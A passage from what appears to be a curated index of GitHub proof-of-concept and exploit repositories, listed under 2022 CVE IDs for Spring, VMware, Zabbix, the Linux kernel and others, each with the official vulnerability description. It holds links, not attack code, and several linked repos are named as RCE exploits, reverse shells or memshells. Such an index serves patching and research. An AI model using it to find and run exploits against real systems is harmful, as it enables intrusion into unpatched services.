[M0ge/CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE](https://github.com/M0ge/CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE) +- [YutuSec/SpEL](https://github.com/YutuSec/SpEL) +- [Jun-5heng/CVE-2022-22947](https://github.com/Jun-5heng/CVE-2022-22947) +- [darkb1rd/cve-2022-22947](https://github.com/darkb1rd/cve-2022-22947) +- [mrknow001/CVE-2022-22947](https://github.com/mrknow001/CVE-2022-22947) +- [0x7eTeam/CVE-2022-22947](https://github.com/0x7eTeam/CVE-2022-22947) +- [ba1ma0/Spring-Cloud-GateWay-CVE-2022-22947-demon-code](https://github.com/ba1ma0/Spring-Cloud-GateWay-CVE-2022-22947-demon-code) +- [Arrnitage/CVE-2022-22947_exp](https://github.com/Arrnitage/CVE-2022-22947_exp) +- [PaoPaoLong-lab/Spring-CVE-2022-22947-](https://github.com/PaoPaoLong-lab/Spring-CVE-2022-22947-) +- [hh-hunter/cve-2022-22947-docker](https://github.com/hh-hunter/cve-2022-22947-docker) +- [k3rwin/spring-cloud-gateway-rce](https://github.com/k3rwin/spring-cloud-gateway-rce) +- [bysinks/CVE-2022-22947](https://github.com/bysinks/CVE-2022-22947) +- [Wrin9/CVE-2022-22947](https://github.com/Wrin9/CVE-2022-22947) +- [viemsr/spring_cloud_gateway_memshell](https://github.com/viemsr/spring_cloud_gateway_memshell) +- [Enokiy/cve-2022-22947-spring-cloud-gateway](https://github.com/Enokiy/cve-2022-22947-spring-cloud-gateway) +- [Nathaniel1025/CVE-2022-22947](https://github.com/Nathaniel1025/CVE-2022-22947) +- [Vancomycin-g/CVE-2022-22947](https://github.com/Vancomycin-g/CVE-2022-22947) +- [scopion/CVE-2022-22947-exp](https://github.com/scopion/CVE-2022-22947-exp) +- [sagaryadav8742/springcloudRCE](https://github.com/sagaryadav8742/springcloudRCE) +- [fbion/CVE-2022-22947](https://github.com/fbion/CVE-2022-22947) +- [talentsec/Spring-Cloud-Gateway-CVE-2022-22947](https://github.com/talentsec/Spring-Cloud-Gateway-CVE-2022-22947) +- [aesm1p/CVE-2022-22947-POC-Reproduce](https://github.com/aesm1p/CVE-2022-22947-POC-Reproduce) +- [4nNns/CVE-2022-22947](https://github.com/4nNns/CVE-2022-22947) +- [expzhizhuo/Burp_VulPscan](https://github.com/expzhizhuo/Burp_VulPscan) +- [twseptian/cve-2022-22947](https://github.com/twseptian/cve-2022-22947) +- [whwlsfb/cve-2022-22947-godzilla-memshell](https://github.com/whwlsfb/cve-2022-22947-godzilla-memshell) +- [0730Nophone/CVE-2022-22947-](https://github.com/0730Nophone/CVE-2022-22947-) +- [anansec/CVE-2022-22947_EXP](https://github.com/anansec/CVE-2022-22947_EXP) +- [Wrong-pixel/CVE-2022-22947-exp](https://github.com/Wrong-pixel/CVE-2022-22947-exp) +- [stayfoolish777/CVE-2022-22947-POC](https://github.com/stayfoolish777/CVE-2022-22947-POC) +- [B0rn2d/Spring-Cloud-Gateway-Nacos](https://github.com/B0rn2d/Spring-Cloud-Gateway-Nacos) +- [kmahyyg/CVE-2022-22947](https://github.com/kmahyyg/CVE-2022-22947) +- [LY613313/CVE-2022-22947](https://github.com/LY613313/CVE-2022-22947) +- [SiJiDo/CVE-2022-22947](https://github.com/SiJiDo/CVE-2022-22947) +- [qq87234770/CVE-2022-22947](https://github.com/qq87234770/CVE-2022-22947) +- [Zh0um1/CVE-2022-22947](https://github.com/Zh0um1/CVE-2022-22947) +- [Le1a/CVE-2022-22947](https://github.com/Le1a/CVE-2022-22947) +- [Sumitpathania03/CVE-2022-22947](https://github.com/Sumitpathania03/CVE-2022-22947) +- [cc3305/CVE-2022-22947](https://github.com/cc3305/CVE-2022-22947) + +### CVE-2022-22948 (2022-03-29) + +The vCenter Server contains an information disclosure vulnerability due to improper permission of files. A malicious actor with non-administrative access to the vCenter Server may exploit this issue to gain access to sensitive information. + + +- [PenteraIO/CVE-2022-22948](https://github.com/PenteraIO/CVE-2022-22948) + +### CVE-2022-22954 (2022-04-11) + +VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. A malicious actor with network access can trigger a server-side template injection that may result in remote code execution. + + +- [axingde/CVE-2022-22954-POC](https://github.com/axingde/CVE-2022-22954-POC) +- [sherlocksecurity/VMware-CVE-2022-22954](https://github.com/sherlocksecurity/VMware-CVE-2022-22954) +- [Vulnmachines/VMWare_CVE-2022-22954](https://github.com/Vulnmachines/VMWare_CVE-2022-22954) +- [aniqfakhrul/CVE-2022-22954](https://github.com/aniqfakhrul/CVE-2022-22954) +- [jax7sec/CVE-2022-22954](https://github.com/jax7sec/CVE-2022-22954) +- [bb33bb/CVE-2022-22954-VMware-RCE](https://github.com/bb33bb/CVE-2022-22954-VMware-RCE) +- [lucksec/VMware-CVE-2022-22954](https://github.com/lucksec/VMware-CVE-2022-22954) +- [mumu2020629/-CVE-2022-22954-scanner](https://github.com/mumu2020629/-CVE-2022-22954-scanner) +- [MSeymenD/CVE-2022-22954-Testi](https://github.com/MSeymenD/CVE-2022-22954-Testi) +- [corelight/cve-2022-22954](https://github.com/corelight/cve-2022-22954) +- [DrorDvash/CVE-2022-22954_VMware_PoC](https://github.com/DrorDvash/CVE-2022-22954_VMware_PoC) +- [Jun-5heng/CVE-2022-22954](https://github.com/Jun-5heng/CVE-2022-22954) +- [tunelko/CVE-2022-22954-PoC](https://github.com/tunelko/CVE-2022-22954-PoC) +- [bewhale/CVE-2022-22954](https://github.com/bewhale/CVE-2022-22954) +- [emilyastranova/VMware-CVE-2022-22954-Command-Injector](https://github.com/emilyastranova/VMware-CVE-2022-22954-Command-Injector) +- [MLX15/CVE-2022-22954](https://github.com/MLX15/CVE-2022-22954) +- [mhurts/CVE-2022-22954-POC](https://github.com/mhurts/CVE-2022-22954-POC) +- [nguyenv1nK/CVE-2022-22954](https://github.com/nguyenv1nK/CVE-2022-22954) +- [Chocapikk/CVE-2022-22954](https://github.com/Chocapikk/CVE-2022-22954) +- [secfb/CVE-2022-22954](https://github.com/secfb/CVE-2022-22954) +- [orwagodfather/CVE-2022-22954](https://github.com/orwagodfather/CVE-2022-22954) +- [b4dboy17/CVE-2022-22954](https://github.com/b4dboy17/CVE-2022-22954) +- [arzuozkan/CVE-2022-22954](https://github.com/arzuozkan/CVE-2022-22954) +- [amit-pathak009/CVE-2022-22954](https://github.com/amit-pathak009/CVE-2022-22954) +- [amit-pathak009/CVE-2022-22954-PoC](https://github.com/amit-pathak009/CVE-2022-22954-PoC) +- [Schira4396/VcenterKiller](https://github.com/Schira4396/VcenterKiller) + +### CVE-2022-22963 (2022-04-01) + +In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. + + +- [hktalent/spring-spel-0day-poc](https://github.com/hktalent/spring-spel-0day-poc) +- [dinosn/CVE-2022-22963](https://github.com/dinosn/CVE-2022-22963) +- [RanDengShiFu/CVE-2022-22963](https://github.com/RanDengShiFu/CVE-2022-22963) +- [darryk10/CVE-2022-22963](https://github.com/darryk10/CVE-2022-22963) +- [Kirill89/CVE-2022-22963-PoC](https://github.com/Kirill89/CVE-2022-22963-PoC) +- [stevemats/Spring0DayCoreExploit](https://github.com/stevemats/Spring0DayCoreExploit) +- [puckiestyle/CVE-2022-22963](https://github.com/puckiestyle/CVE-2022-22963) +- [me2nuk/CVE-2022-22963](https://github.com/me2nuk/CVE-2022-22963) +- [kh4sh3i/Spring-CVE](https://github.com/kh4sh3i/Spring-CVE) +- [AayushmanThapaMagar/CVE-2022-22963](https://github.com/AayushmanThapaMagar/CVE-2022-22963) +- [twseptian/cve-2022-22963](https://github.com/twseptian/cve-2022-22963) +- [SealPaPaPa/SpringCloudFunction-Research](https://github.com/SealPaPaPa/SpringCloudFunction-Research) +- [G01d3nW01f/CVE-2022-22963](https://github.com/G01d3nW01f/CVE-2022-22963) +- [k3rwin/spring-cloud-function-rce](https://github.com/k3rwin/spring-cloud-function-rce) +- [75ACOL/CVE-2022-22963](https://github.com/75ACOL/CVE-2022-22963) +- [dr6817/CVE-2022-22963](https://github.com/dr6817/CVE-2022-22963) +- [iliass-dahman/CVE-2022-22963-POC](https://github.com/iliass-dahman/CVE-2022-22963-POC) +- [charis3306/CVE-2022-22963](https://github.com/charis3306/CVE-2022-22963) +- [lemmyz4n3771/CVE-2022-22963-PoC](https://github.com/lemmyz4n3771/CVE-2022-22963-PoC) +- [J0ey17/CVE-2022-22963_Reverse-Shell-Exploit](https://github.com/J0ey17/CVE-2022-22963_Reverse-Shell-Exploit) +- [Mustafa1986/CVE-2022-22963](https://github.com/Mustafa1986/CVE-2022-22963) +- [SourM1lk/CVE-2022-22963-Exploit](https://github.com/SourM1lk/CVE-2022-22963-Exploit) +- [randallbanner/Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE](https://github.com/randallbanner/Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE) +- [gunzf0x/CVE-2022-22963](https://github.com/gunzf0x/CVE-2022-22963) +- [nikn0laty/RCE-in-Spring-Cloud-CVE-2022-22963](https://github.com/nikn0laty/RCE-in-Spring-Cloud-CVE-2022-22963) +- [BearClaw96/CVE-2022-22963-Poc-Bearcules](https://github.com/BearClaw96/CVE-2022-22963-Poc-Bearcules) +- [jrbH4CK/CVE-2022-22963](https://github.com/jrbH4CK/CVE-2022-22963) + +### CVE-2022-22965 (2022-04-01) + +A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. + + +- [BobTheShoplifter/Spring4Shell-POC](https://github.com/BobTheShoplifter/Spring4Shell-POC) +- [Mr-xn/spring-core-rce](https://github.com/Mr-xn/spring-core-rce) +- [TheGejr/SpringShell](https://github.com/TheGejr/SpringShell) +- [reznok/Spring4Shell-POC](https://github.com/reznok/Spring4Shell-POC) +- [light-Life/CVE-2022-22965-GUItools](https://github.com/light-Life/CVE-2022-22965-GUItools) +- [DDuarte/springshell-rce-poc](https://github.com/DDuarte/springshell-rce-poc) +- [k3rwin/spring-core-rce](https://github.com/k3rwin/spring-core-rce) +- [liangyueliangyue/spring-core-rce](https://github.com/liangyueliangyue/spring-core-rce) +- [Kirill89/CVE-2022-22965-PoC](https://github.com/Kirill89/CVE-2022-22965-PoC) +- [FourCoreLabs/spring4shell-exploit-poc](https://github.com/FourCoreLabs/spring4shell-exploit-poc) +- [alt3kx/CVE-2022-22965_PoC](https://github.com/alt3kx/CVE-2022-22965_PoC) +- [GuayoyoCyber/CVE-2022-22965](https://github.com/GuayoyoCyber/CVE-2022-22965) +- [colincowie/Safer_PoC_CVE-2022-22965](https://github.com/colincowie/Safer_PoC_CVE-2022-22965) +- [rwincey/spring4shell-CVE-2022-22965](https://github.com/rwincey/spring4shell-CVE-2022-22965) +- [viniciuspereiras/CVE-2022-22965-poc](https://github.com/viniciuspereiras/CVE-2022-22965-poc) +- [mebibite/springhound](https://github.com/mebibite/springhound) +- [likewhite/CVE-2022-22965](https://github.com/likewhite/CVE-2022-22965) +- [Axx8/SpringFramework_CVE-2022-22965_RCE](https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE) +- [snicoll-scratches/spring-boot-cve-2022-22965](https://github.com/snicoll-scratches/spring-boot-cve-2022-22965) +- [nu0l/CVE-2022-22965](https://github.com/nu0l/CVE-2022-22965) +- [tangxiaofeng7/CVE-2022-22965-Spring-Core-Rce](https://github.com/tangxiaofeng7/CVE-2022-22965-Spring-Core-Rce) +- [helsecert/CVE-2022-22965](https://github.com/helsecert/CVE-2022-22965) +- [lcarea/CVE-2022-22965](https://github.com/lcarea/CVE-2022-22965) +- [Joe1sn/CVE-2022-22965](https://github.com/Joe1sn/CVE-2022-22965) +- [zer0yu/CVE-2022-22965](https://github.com/zer0yu/CVE-2022-22965) +- [me2nuk/CVE-2022-22965](https://github.com/me2nuk/CVE-2022-22965) +- [wshon/spring-framework-rce](https://github.com/wshon/spring-framework-rce) +- [Wrin9/CVE-2022-22965](https://github.com/Wrin9/CVE-2022-22965) +- [wjl110/CVE-2022-22965_Spring_Core_RCE](https://github.com/wjl110/CVE-2022-22965_Spring_Core_RCE) +- [mwojterski/cve-2022-22965](https://github.com/mwojterski/cve-2022-22965) +- [gpiechnik2/nmap-spring4shell](https://github.com/gpiechnik2/nmap-spring4shell) +- [itsecurityco/CVE-2022-22965](https://github.com/itsecurityco/CVE-2022-22965) +- [daniel0x00/Invoke-CVE-2022-22965-SafeCheck](https://github.com/daniel0x00/Invoke-CVE-2022-22965-SafeCheck) +- [fracturelabs/spring4shell_victim](https://github.com/fracturelabs/spring4shell_victim) +- [sunnyvale-it/CVE-2022-22965-PoC](https://github.com/sunnyvale-it/CVE-2022-22965-PoC) +- [twseptian/cve-2022-22965](https://github.com/twseptian/cve-2022-22965) +- [netcode/Spring4shell-CVE-2022-22965-POC](https://github.com/netcode/Spring4shell-CVE-2022-22965-POC) +- [fracturelabs/go-scan-spring](https://github.com/fracturelabs/go-scan-spring) +- [Snip3R69/spring-shell-vuln](https://github.com/Snip3R69/spring-shell-vuln) +- [luoqianlin/CVE-2022-22965](https://github.com/luoqianlin/CVE-2022-22965) +- [0xrobiul/CVE-2022-22965](https://github.com/0xrobiul/CVE-2022-22965) +- [LudovicPatho/CVE-2022-22965_Spring4Shell](https://github.com/LudovicPatho/CVE-2022-22965_Spring4Shell) +- [irgoncalves/irule-cve-2022-22965](https://github.com/irgoncalves/irule-cve-2022-22965) +- [datawiza-inc/spring-rec-demo](https://github.com/datawiza-inc/spring-rec-demo) +- [alt3kx/CVE-2022-22965](https://github.com/alt3kx/CVE-2022-22965) +- [wikiZ/springboot_CVE-2022-22965](https://github.com/wikiZ/springboot_CVE-2022-22965) +- [4nth0ny1130/spring4shell_behinder](https://github.com/4nth0ny1130/spring4shell_behinder) +- [t3amj3ff/Spring4ShellPoC](https://github.com/t3amj3ff/Spring4ShellPoC) +- [CalumHutton/CVE-2022-22965-PoC_Payara](https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara) +- [fransvanbuul/CVE-2022-22965-susceptibility](https://github.com/fransvanbuul/CVE-2022-22965-susceptibility) +- [te5t321/Spring4Shell-CVE-2022-22965.py](https://github.com/te5t321/Spring4Shell-CVE-2022-22965.py) +- [Loneyers/Spring4Shell](https://github.com/Loneyers/Spring4Shell) +- [p1ckzi/CVE-2022-22965](https://github.com/p1ckzi/CVE-2022-22965) +- [Omaraitbenhaddi/-Spring4Shell-CVE-2022-22965-](https://github.com/Omaraitbenhaddi/-Spring4Shell-CVE-2022-22965-) +- [c4mx/CVE-2022-22965_PoC](https://github.com/c4mx/CVE-2022-22965_PoC) +- [mariomamo/CVE-2022-22965](https://github.com/mariomamo/CVE-2022-22965) +- [khidottrivi/CVE-2022-22965](https://github.com/khidottrivi/CVE-2022-22965) +- [Enokiy/spring-RCE-CVE-2022-22965](https://github.com/Enokiy/spring-RCE-CVE-2022-22965) +- [cxzero/CVE-2022-22965-spring4shell](https://github.com/cxzero/CVE-2022-22965-spring4shell) +- [tpt11fb/SpringVulScan](https://github.com/tpt11fb/SpringVulScan) +- [D1mang/Spring4Shell-CVE-2022-22965](https://github.com/D1mang/Spring4Shell-CVE-2022-22965) +- [iloveflag/Fast-CVE-2022-22965](https://github.com/iloveflag/Fast-CVE-2022-22965) +- [ClemExp/CVE-2022-22965-PoC](https://github.com/ClemExp/CVE-2022-22965-PoC) +- [clemoregan/SSE4-CVE-2022-22965](https://github.com/clemoregan/SSE4-CVE-2022-22965) +- [devengpk/CVE-2022-22965](https://github.com/devengpk/CVE-2022-22965) +- [zangcc/CVE-2022-22965-rexbb](https://github.com/zangcc/CVE-2022-22965-rexbb) +- [ajith737/Spring4Shell-CVE-2022-22965-POC](https://github.com/ajith737/Spring4Shell-CVE-2022-22965-POC) +- [c33dd/CVE-2022-22965](https://github.com/c33dd/CVE-2022-22965) +- [gokul-ramesh/Spring4Shell-PoC-exploit](https://github.com/gokul-ramesh/Spring4Shell-PoC-exploit) +- [bL34cHig0/Telstra-Cybersecurity-Virtual-Experience-](https://github.com/bL34cHig0/Telstra-Cybersecurity-Virtual-Experience-) +- [BKLockly/CVE-2022-22965](https://github.com/BKLockly/CVE-2022-22965) +- [dbgee/Spring4Shell](https://github.com/dbgee/Spring4Shell) +- [jakabakos/CVE-2022-22965-Spring4Shell](https://github.com/jakabakos/CVE-2022-22965-Spring4Shell) +- [sohamsharma966/Spring4Shell-CVE-2022-22965](https://github.com/sohamsharma966/Spring4Shell-CVE-2022-22965) +- [LucasPDiniz/CVE-2022-22965](https://github.com/LucasPDiniz/CVE-2022-22965) +- [xsxtw/SpringFramework_CVE-2022-22965_RCE](https://github.com/xsxtw/SpringFramework_CVE-2022-22965_RCE) +- [guigui237/Expoitation-de-la-vuln-rabilit-CVE-2022-22965](https://github.com/guigui237/Expoitation-de-la-vuln-rabilit-CVE-2022-22965) + +### CVE-2022-22966 (2022-04-14) + +An authenticated, high privileged malicious actor with network access to the VMware Cloud Director tenant or provider may be able to exploit a remote code execution vulnerability to gain access to the server. + + +- [bb33bb/CVE-2022-22966](https://github.com/bb33bb/CVE-2022-22966) + +### CVE-2022-22968 (2022-04-14) + +In Spring Framework versions 5.3.0 - 5.3.18, 5.2.0 - 5.2.20, and older unsupported versions, the patterns for disallowedFields on a DataBinder are case sensitive which means a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including upper and lower case for the first character of all nested fields within the property path. + + +- [MarcinGadz/spring-rce-poc](https://github.com/MarcinGadz/spring-rce-poc) + +### CVE-2022-22970 (2022-05-12) + +In spring framework versions prior to 5.3.20+ , 5.2.22+ and old unsupported versions, applications that handle file uploads are vulnerable to DoS attack if they rely on data binding to set a MultipartFile or javax.servlet.Part to a field in a model object. + + +- [Performant-Labs/CVE-2022-22970](https://github.com/Performant-Labs/CVE-2022-22970) + +### CVE-2022-22971 (2022-05-12) + +In spring framework versions prior to 5.3.20+ , 5.2.22+ and old unsupported versions, application with a STOMP over WebSocket endpoint is vulnerable to a denial of service attack by an authenticated user. + + +- [tchize/CVE-2022-22971](https://github.com/tchize/CVE-2022-22971) + +### CVE-2022-22972 (2022-05-20) + +VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. + + +- [horizon3ai/CVE-2022-22972](https://github.com/horizon3ai/CVE-2022-22972) +- [Dghpi9/CVE-2022-22972](https://github.com/Dghpi9/CVE-2022-22972) +- [bengisugun/CVE-2022-22972-](https://github.com/bengisugun/CVE-2022-22972-) + +### CVE-2022-22976 (2022-05-19) + +Spring Security versions 5.5.x prior to 5.5.7, 5.6.x prior to 5.6.4, and earlier unsupported versions contain an integer overflow vulnerability. When using the BCrypt class with the maximum work factor (31), the encoder does not perform any salt rounds, due to an integer overflow error. The default settings are not affected by this CVE. + + +- [spring-io/cve-2022-22976-bcrypt-skips-salt](https://github.com/spring-io/cve-2022-22976-bcrypt-skips-salt) + +### CVE-2022-22978 (2022-05-19) + +In spring security versions prior to 5.4.11+, 5.5.7+ , 5.6.4+ and older unsupported versions, RegexRequestMatcher can easily be misconfigured to be bypassed on some servlet containers. Applications using RegexRequestMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass. + + +- [DeEpinGh0st/CVE-2022-22978](https://github.com/DeEpinGh0st/CVE-2022-22978) +- [ducluongtran9121/CVE-2022-22978-PoC](https://github.com/ducluongtran9121/CVE-2022-22978-PoC) +- [aeifkz/CVE-2022-22978](https://github.com/aeifkz/CVE-2022-22978) +- [umakant76705/CVE-2022-22978](https://github.com/umakant76705/CVE-2022-22978) +- [Raghvendra1207/CVE-2022-22978](https://github.com/Raghvendra1207/CVE-2022-22978) +- [wan9xx/CVE-2022-22978-demo](https://github.com/wan9xx/CVE-2022-22978-demo) +- [BoB13-Opensource-Contribution-Team9/CVE-2022-22978](https://github.com/BoB13-Opensource-Contribution-Team9/CVE-2022-22978) + +### CVE-2022-22980 (2022-06-22) + +A Spring Data MongoDB application is vulnerable to SpEL Injection when using @Query or @Aggregation-annotated query methods with SpEL expressions that contain query parameter placeholders for value binding if the input is not sanitized. + + +- [trganda/CVE-2022-22980](https://github.com/trganda/CVE-2022-22980) +- [kuron3k0/Spring-Data-Mongodb-Example](https://github.com/kuron3k0/Spring-Data-Mongodb-Example) +- [li8u99/Spring-Data-Mongodb-Demo](https://github.com/li8u99/Spring-Data-Mongodb-Demo) +- [jweny/cve-2022-22980](https://github.com/jweny/cve-2022-22980) +- [murataydemir/CVE-2022-22980](https://github.com/murataydemir/CVE-2022-22980) +- [Vulnmachines/Spring_cve-2022-22980](https://github.com/Vulnmachines/Spring_cve-2022-22980) + +### CVE-2022-23046 (2022-01-19) + +PhpIPAM v1.4.4 allows an authenticated admin user to inject SQL sentences in the "subnet" parameter while searching a subnet via app/admin/routing/edit-bgp-mapping-search.php + + +- [jcarabantes/CVE-2022-23046](https://github.com/jcarabantes/CVE-2022-23046) +- [dnr6419/CVE-2022-23046](https://github.com/dnr6419/CVE-2022-23046) +- [hadrian3689/phpipam_1.4.4](https://github.com/hadrian3689/phpipam_1.4.4) +- [bernauers/CVE-2022-23046](https://github.com/bernauers/CVE-2022-23046) + +### CVE-2022-23093 (2024-02-15) + +ping reads raw IP packets from the network to process responses in the pr_pack() function. As part of processing a response ping has to reconstruct the IP header, the ICMP header and if present a "quoted packet," which represents the packet that generated an ICMP error. The quoted packet again has an IP header and an ICMP header.\n\nThe pr_pack() copies received IP and ICMP headers into stack buffers for further processing. In so doing, it fails to take into account the possible presence of IP option headers following the IP header in either the response or the quoted packet. When IP options are present, pr_pack() overflows the destination buffer by up to 40 bytes.\n\nThe memory safety bugs described above can be triggered by a remote host, causing the ping program to crash.\n\nThe ping process runs in a capability mode sandbox on all affected versions of FreeBSD and is thus very constrained in how it can interact with the rest of the system at the point where the bug can occur. + + +- [Inplex-sys/CVE-2022-23093](https://github.com/Inplex-sys/CVE-2022-23093) +- [Symbolexe/DrayTek-Exploit](https://github.com/Symbolexe/DrayTek-Exploit) + +### CVE-2022-23131 (2022-01-13) + +In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified. Malicious unauthenticated actor may exploit this issue to escalate privileges and gain admin access to Zabbix Frontend. To perform the attack, SAML authentication is required to be enabled and the actor has to know the username of Zabbix user (or use the guest account, which is disabled by default). + + +- [qq1549176285/CVE-2022-23131](https://github.com/qq1549176285/CVE-2022-23131) +- [jweny/CVE-2022-23131](https://github.com/jweny/CVE-2022-23131) +- [Mr-xn/cve-2022-23131](https://github.com/Mr-xn/cve-2022-23131) +- [1mxml/CVE-2022-23131](https://github.com/1mxml/CVE-2022-23131) +- [zwjjustdoit/cve-2022-23131](https://github.com/zwjjustdoit/cve-2022-23131) +- [L0ading-x/cve-2022-23131](https://github.com/L0ading-x/cve-2022-23131) +- [random-robbie/cve-2022-23131-exp](https://github.com/random-robbie/cve-2022-23131-exp) +- [trganda/CVE-2022-23131](https://github.com/trganda/CVE-2022-23131) +- [pykiller/CVE-2022-23131](https://github.com/pykiller/CVE-2022-23131) +- [Fa1c0n35/zabbix-cve-2022-23131](https://github.com/Fa1c0n35/zabbix-cve-2022-23131) +- [kh4sh3i/CVE-2022-23131](https://github.com/kh4sh3i/CVE-2022-23131) +- [Kazaf6s/CVE-2022-23131](https://github.com/Kazaf6s/CVE-2022-23131) +- [SCAMagic/CVE-2022-23131poc-exp-zabbix-](https://github.com/SCAMagic/CVE-2022-23131poc-exp-zabbix-) +- [Vulnmachines/Zabbix-CVE-2022-23131](https://github.com/Vulnmachines/Zabbix-CVE-2022-23131) +- [wr0x00/cve-2022-23131](https://github.com/wr0x00/cve-2022-23131) +- [Arrnitage/CVE-2022-23131_exp](https://github.com/Arrnitage/CVE-2022-23131_exp) +- [clearcdq/Zabbix-SAML-SSO-_CVE-2022-23131](https://github.com/clearcdq/Zabbix-SAML-SSO-_CVE-2022-23131) +- [r10lab/CVE-2022-23131](https://github.com/r10lab/CVE-2022-23131) +- [fork-bombed/CVE-2022-23131](https://github.com/fork-bombed/CVE-2022-23131) +- [davidzzo23/CVE-2022-23131](https://github.com/davidzzo23/CVE-2022-23131) + +### CVE-2022-23222 (2022-01-14) + +kernel/bpf/verifier.c in the Linux kernel through 5.15.14 allows local users to gain privileges because of the availability of pointer arithmetic via certain *_OR_NULL pointer types. + + +- [tr3ee/CVE-2022-23222](https://github.com/tr3ee/CVE-2022-23222) +- [PenteraIO/CVE-2022-23222-POC](https://github.com/PenteraIO/CVE-2022-23222-POC) +- [FridayOrtiz/CVE-2022-23222](https://github.com/FridayOrtiz/CVE-2022-23222) +- [LeoMarche/ProjetSecu](https://github.com/LeoMarche/ProjetSecu) + +### CVE-2022-23253 (2022-03-09) + +Windows Point-to-Point Tunneling Protocol Denial of Service Vulnerability + + +- [nettitude/CVE-2022-23253-PoC](https://github.com/nettitude/CVE-2022-23253-PoC) + +### CVE-2022-23270 (2022-05-10) + +Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability + + +- [corelight/CVE-2022-23270-PPTP](https://github.com/corelight/CVE-2022-23270-PPTP) + +### CVE-2022-23277 (2022-03-09) + +Microsoft Exchange Server Remote Code Execution Vulnerability + + +- [7BitsTeam/CVE-2022-23277](https://github.com/7BitsTeam/CVE-2022-23277) + +### CVE-2022-23303 (2022-01-17) + +The implementations of SAE in hostapd before 2.10 and wpa_supplicant before 2.10 are vulnerable to side channel attacks as a result of cache access patterns. NOTE: this issue exists because of an incomplete fix for CVE-2019-9494. + + +- [skulkarni-mv/hostapd_mirror](https://github.com/skulkarni-mv/hostapd_mirror) + +### CVE-2022-23305 (2022-01-18) + +By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed. Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default. Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. + + +- [HynekPetrak/log4shell-finder](https://github.com/HynekPetrak/log4shell-finder) +- [AlphabugX/CVE-2022-RCE](https://github.com/AlphabugX/CVE-2022-RCE) +- [tkomlodi/CVE-2022-23305_POC](https://github.com/tkomlodi/CVE-2022-23305_POC) + +### CVE-2022-23342 (2022-06-21) + +The Hyland Onbase Application Server releases prior to 20.3.58.1000 and OnBase releases 21.1.1.1000 through 21.1.15.1000 are vulnerable to a username enumeration vulnerability. An attacker can obtain valid users based on the response returned for invalid and valid users by sending a POST login request to the /mobilebroker/ServiceToBroker.svc/Json/Connect endpoint. This can lead to user enumeration against the underlying Active Directory integrated systems. + + +- [InitRoot/CVE-2022-23342](https://github.com/InitRoot/CVE-2022-23342) + +### CVE-2022-23361 +- [ViNi0608/CVE-2022-23361](https://github.com/ViNi0608/CVE-2022-23361) + +### CVE-2022-23378 (2022-02-09) + +A Cross-Site Scripting (XSS) vulnerability exists within the 3.2.2 version of TastyIgniter. The "items%5B0%5D%5Bpath%5D" parameter of a request made to /admin/allergens/edit/1 is vulnerable. + + +- [TheGetch/CVE-2022-23378](https://github.com/TheGetch/CVE-2022-23378) + +### CVE-2022-23529 +- [despossivel/CVE-2022-23529-lab](https://github.com/despossivel/CVE-2022-23529-lab) +- [hackintoanetwork/CVE-2022-23529-PoC](https://github.com/hackintoanetwork/CVE-2022-23529-PoC) + +### CVE-2022-23614 (2022-02-04) + +Twig is an open source template language for PHP. When in a sandbox mode, the `arrow` parameter of the `sort` filter must be a closure to avoid attackers being able to run arbitrary PHP functions. In affected versions this constraint was not properly enforced and could lead to code injection of arbitrary PHP code. Patched versions now disallow calling non Closure in the `sort` filter as is the case for some other filters. Users are advised to upgrade. + + +- [davwwwx/CVE-2022-23614](https://github.com/davwwwx/CVE-2022-23614) +- [4rtamis/CVE-2022-23614](https://github.com/4rtamis/CVE-2022-23614) + +### CVE-2022-23642 (2022-02-18) + +Sourcegraph is a code search and navigation engine. Sourcegraph prior to version 3.37 is vulnerable to remote code execution in the `gitserver` service. The service acts as a git exec proxy, and fails to properly restrict calling `git config`. This allows an attacker to set the git `core.sshCommand` option, which sets git to use the specified command instead of ssh when they need to connect to a remote system. Exploitation of this vulnerability depends on how Sourcegraph is deployed. An attacker able to make HTTP requests to internal services like gitserver is able to exploit it. This issue is patched in Sourcegraph version 3.37. As a workaround, ensure that requests to gitserver are properly protected. + + +- [Altelus1/CVE-2022-23642](https://github.com/Altelus1/CVE-2022-23642) + +### CVE-2022-23648 (2022-03-03) + +containerd is a container runtime available as a daemon for Linux and Windows. A bug was found in containerd prior to versions 1.6.1, 1.5.10, and 1.14.12 where containers launched through containerd’s CRI implementation on Linux with a specially-crafted image configuration could gain access to read-only copies of arbitrary files and directories on the host. This may bypass any policy-based enforcement on container setup (including a Kubernetes Pod Security Policy) and expose potentially sensitive information. Kubernetes and crictl can both be configured to use containerd’s CRI implementation. This bug has been fixed in containerd 1.6.1, 1.5.10, and 1.4.12. Users should update to these versions to resolve the issue. + + +- [raesene/CVE-2022-23648-POC](https://github.com/raesene/CVE-2022-23648-POC) + +### CVE-2022-23731 (2022-03-11) + +V8 javascript engine (heap vulnerability) can cause 